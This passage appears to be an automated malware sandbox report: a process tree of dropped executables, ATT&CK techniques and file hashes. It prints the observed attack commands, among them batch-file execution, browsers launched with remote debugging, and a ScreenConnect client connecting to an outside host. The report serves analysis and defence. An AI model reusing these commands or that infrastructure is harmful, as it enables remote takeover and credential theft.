        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4784,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4680 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:11008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5340 /prefetch:8
        8⤵
        
        PID:11704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5380,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5392 /prefetch:8
        8⤵
        
        PID:11820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5324,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:8
        8⤵
        
        PID:3676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5368 /prefetch:8
        8⤵
        
        PID:12420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5384 /prefetch:8
        8⤵
        
        PID:6772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5660,i,14459220413864770476,15400359173792700444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5692 /prefetch:8
        8⤵
        
        PID:772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:9252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        8⤵
        Uses browser remote debugging
        
        PID:9340
    - - C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:9456
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9556
    - - C:\Users\Admin\AppData\Local\Temp\10342570101\BIm18E9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342570101\BIm18E9.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5880
    - - C:\Users\Admin\AppData\Local\Temp\10342580101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342580101\7IIl2eE.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:7296
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7540
    - - C:\Users\Admin\AppData\Local\Temp\10342590101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342590101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2144
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        6⤵
        
        PID:8452
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6609.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6609.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3100
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3g52f.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3g52f.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
    3⤵
    - Uses browser remote debugging
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffe25cedcf8,0x7ffe25cedd04,0x7ffe25cedd10
      4⤵
      PID:6108
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2176,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2196 /prefetch:3
      4⤵
      PID:860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2076,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2072 /prefetch:2
      4⤵
      PID:2268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2420 /prefetch:8
      4⤵
      PID:5416
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4060
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3332 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5600
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4332,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4348 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5476
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4652,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4708 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3828
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4916,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5248 /prefetch:8
      4⤵
      PID:2956
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5456 /prefetch:8
      4⤵
      PID:2204
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5396,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5388 /prefetch:8
      4⤵
      PID:4936
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5400,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3760 /prefetch:8
      4⤵
      PID:3548
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5760 /prefetch:8
      4⤵
      PID:4000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5372,i,316504406480693393,15261328270006264868,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5792 /prefetch:8
      4⤵
      PID:4588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
    3⤵
    - Uses browser remote debugging
    PID:4828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffe2481f208,0x7ffe2481f214,0x7ffe2481f220
        5⤵
        
        PID:5148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:3
        5⤵
        
        PID:2040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2096,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:2
        5⤵
        
        PID:5652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2492,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
        5⤵
        
        PID:1592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4188,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4204,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:6060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3780,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:8
        5⤵
        
        PID:3364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:8
        5⤵
        
        PID:4068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4996,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8
        5⤵
        
        PID:6004
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5172,i,15890328146925936614,7079658497527629098,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:8
        5⤵
        
        PID:3936

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1824

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:13224

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8DD1C97536BD4A9EA150F834AEDDC4EF C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:8228
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI76E1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240678687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:8320
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5084
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 71807A2F801F1DA232C36B76B6F28F3A
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:12736
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9E8340AC1C435BB276819CDF07290638 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:13012

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4392

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=67825598-e6d3-483b-b1f9-63d40d7c12d7&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=purchased"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:13096
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "799e24fd-ab30-42eb-8db1-3bec9d6f4145" "User"
  2⤵
  - Executes dropped EXE
  PID:2032
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "04e0100c-3e2d-4c42-bb1a-377959a9d5cb" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:6912

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:11916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 11164 -ip 11164
1⤵
PID:1612

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:10080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58b513.rbs

Filesize
214KB

MD5
015a445d56dffec7136a20659bf7338e

SHA1
92aabbd89224ebdfc94431635bfe405c79bd9db6

SHA256
37f8546bbbcdfebcae4cb1b7ac412665a3b1010fc57532bce5284c30eaef0443

SHA512
ca8b08aa0126242357f16984977d5c426e5d47ee209b45530da6134b680cbb3e8b482b3914e23115bba341caee4a1ad62ae95b51a483f365b54389194845f743

Download Submit
C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_6bbb4d94a_arkmon.sys

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\ProgramData\as00r\58y5fk

Filesize
6KB

MD5
9ac25e569ee25984a81a95aba4a55228

SHA1
69ff2cdbccf1804b39f59aa7bbfd391f67fb6dda

SHA256
93444cc5c4401a4e4c3c102a66cebc9fd1531888965b2ce9db009df63661b663

SHA512
681fbd98973cd2ef246e3756374bb3591162a49d8a4c82063f715809676afb3ba862ce680736e0e7656e8697813a7aa93c2db80546db72e3fa55b34d3b39ecfe

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
